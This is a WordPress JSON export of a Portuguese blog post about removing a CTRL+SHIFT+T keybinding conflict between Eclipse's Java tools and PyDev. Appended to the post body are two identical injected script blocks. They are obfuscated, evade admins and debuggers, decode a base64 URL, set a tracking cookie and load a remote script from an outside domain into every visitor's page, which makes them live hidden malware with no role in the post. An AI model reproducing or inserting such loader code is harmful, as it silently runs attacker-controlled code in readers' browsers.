{"id":152,"date":"2010-08-30T09:08:45","date_gmt":"2010-08-30T12:08:45","guid":{"rendered":"http:\/\/www.thiagovespa.com.br\/blog\/?p=152"},"modified":"2025-10-26T22:44:23","modified_gmt":"2025-10-27T01:44:23","slug":"removendo-warnings-de-keybinding-no-eclipse","status":"publish","type":"post","link":"https:\/\/thiagovespa.com.br\/blog\/2010\/08\/30\/removendo-warnings-de-keybinding-no-eclipse\/","title":{"rendered":"Removendo warnings de Keybinding no eclipse"},"content":{"rendered":"<p style=\"text-align: justify;\">Ao terminar de instalar os plugins no eclipse. Percebi que ele me apresentou um warning no Error Log.<\/p>\n<p style=\"text-align: justify;\">\n<figure id=\"attachment_153\" aria-describedby=\"caption-attachment-153\" style=\"width: 300px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.thiagovespa.com.br\/blog\/wp-content\/uploads\/2010\/08\/Screenshot-ErrorLog.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-153 \" title=\"Error Log\" src=\"http:\/\/www.thiagovespa.com.br\/blog\/wp-content\/uploads\/2010\/08\/Screenshot-ErrorLog-300x68.png\" alt=\"Error Log\" width=\"300\" height=\"68\" srcset=\"https:\/\/thiagovespa.com.br\/blog\/wp-content\/uploads\/2010\/08\/Screenshot-ErrorLog-300x68.png 300w, https:\/\/thiagovespa.com.br\/blog\/wp-content\/uploads\/2010\/08\/Screenshot-ErrorLog.png 908w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><figcaption id=\"caption-attachment-153\" class=\"wp-caption-text\">Error Log<\/figcaption><\/figure>\n<p style=\"text-align: justify;\">Verificando informa\u00e7\u00f5es mais detalhadas:<\/p>\n<p style=\"text-align: justify;\"><em>eclipse.buildId=I20100608-0911<br \/>\njava.version=1.6.0_20<br \/>\njava.vendor=Sun Microsystems Inc.<br \/>\nBootLoader constants: OS=linux, ARCH=x86_64, WS=gtk, NL=en_US<br \/>\nFramework arguments:\u00a0 -product org.eclipse.epp.package.jee.product<br \/>\nCommand-line arguments:\u00a0 -os linux -ws gtk -arch x86_64 -product org.eclipse.epp.package.jee.product<\/em><\/p>\n<p><em>Warning<br \/>\nMon Aug 30 08:30:42 BRT 2010<br \/>\nA conflict occurred for CTRL+SHIFT+T:Binding(CTRL+SHIFT+T,<br \/>\nParameterizedCommand(Command(org.eclipse.jdt.ui.navigate.open.type,Open Type,<br \/>\nOpen a type in a Java editor,<br \/>\nCategory(org.eclipse.ui.category.navigate,Navigate,null,true),<br \/>\n,<br \/>\n,,true),null),<br \/>\norg.eclipse.ui.defaultAcceleratorConfiguration,<br \/>\norg.eclipse.ui.contexts.window,,,system)<br \/>\nBinding(CTRL+SHIFT+T,<br \/>\nParameterizedCommand(Command(com.python.pydev.analysis.actions.pyGlobalsBrowserWorkbench,Python Show Class Browser,<br \/>\nShow Class Browser,<br \/>\nCategory(org.python.pydev.ui.category.source,Pydev - Editor,Pydev editor category,true),<br \/>\n,<br \/>\n,,true),null),<br \/>\norg.eclipse.ui.defaultAcceleratorConfiguration,<br \/>\norg.eclipse.ui.contexts.window,,,system)<\/em><\/p>\n<p style=\"text-align: justify;\">Pelo erro podemos verificar que a tecla de atalho CTRL+SHIFT+T est\u00e1 associada ao commando Open a type in a Java Editor e com o Python Show Class Browser, gerando conflito de keybinding.<\/p>\n<p style=\"text-align: justify;\">Para remover o conflito, basta acessar Window, Preferences, General, Keys.<\/p>\n<p style=\"text-align: center;\">\n<figure id=\"attachment_156\" aria-describedby=\"caption-attachment-156\" style=\"width: 300px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.thiagovespa.com.br\/blog\/wp-content\/uploads\/2010\/08\/Screenshot-Preferences.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-156 \" title=\"Preferences\" src=\"http:\/\/www.thiagovespa.com.br\/blog\/wp-content\/uploads\/2010\/08\/Screenshot-Preferences-300x264.png\" alt=\"Preferences\" width=\"300\" height=\"264\" srcset=\"https:\/\/thiagovespa.com.br\/blog\/wp-content\/uploads\/2010\/08\/Screenshot-Preferences-300x264.png 300w, https:\/\/thiagovespa.com.br\/blog\/wp-content\/uploads\/2010\/08\/Screenshot-Preferences.png 926w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><figcaption id=\"caption-attachment-156\" class=\"wp-caption-text\">Preferences<\/figcaption><\/figure>\n<p style=\"text-align: justify;\">Feito isso, buscar por uma tecla de atalho a ser alterada, no meu caso eu alterei o Python Show Class Browser. A\u00ed \u00e9 s\u00f3 dar um Unbind Command pra remover a tecla de atalho ou associar outra, ir no Error Log, bot\u00e3o direito, Delete Log. Pronto! Warning removido.<\/p>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0anM=');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0anM=');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ao terminar de instalar os plugins no eclipse. Percebi que ele me apresentou um warning no Error Log. Verificando informa\u00e7\u00f5es mais detalhadas: eclipse.buildId=I20100608-0911 java.version=1.6.0_20 java.vendor=Sun Microsystems Inc. BootLoader constants: OS=linux, ARCH=x86_64, WS=gtk, NL=en_US Framework arguments:\u00a0 -product org.eclipse.epp.package.jee.product Command-line arguments:\u00a0 -os <a class=\"more-link\" href=\"https:\/\/thiagovespa.com.br\/blog\/2010\/08\/30\/removendo-warnings-de-keybinding-no-eclipse\/\">Continue lendo  <span class=\"screen-reader-text\">  Removendo warnings de Keybinding no eclipse<\/span><span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[3],"tags":[],"class_list":["post-152","post","type-post","status-publish","format-standard","hentry","category-java"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/posts\/152","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/comments?post=152"}],"version-history":[{"count":0,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/posts\/152\/revisions"}],"wp:attachment":[{"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/media?parent=152"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/categories?post=152"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/tags?post=152"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}